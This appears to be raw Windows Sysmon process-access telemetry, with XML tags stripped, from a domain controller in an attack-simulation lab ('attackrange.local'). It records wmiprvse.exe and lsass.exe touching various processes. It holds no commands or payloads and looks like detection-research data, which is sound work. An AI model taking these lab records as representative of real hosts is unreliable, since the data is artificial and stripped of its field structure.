16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 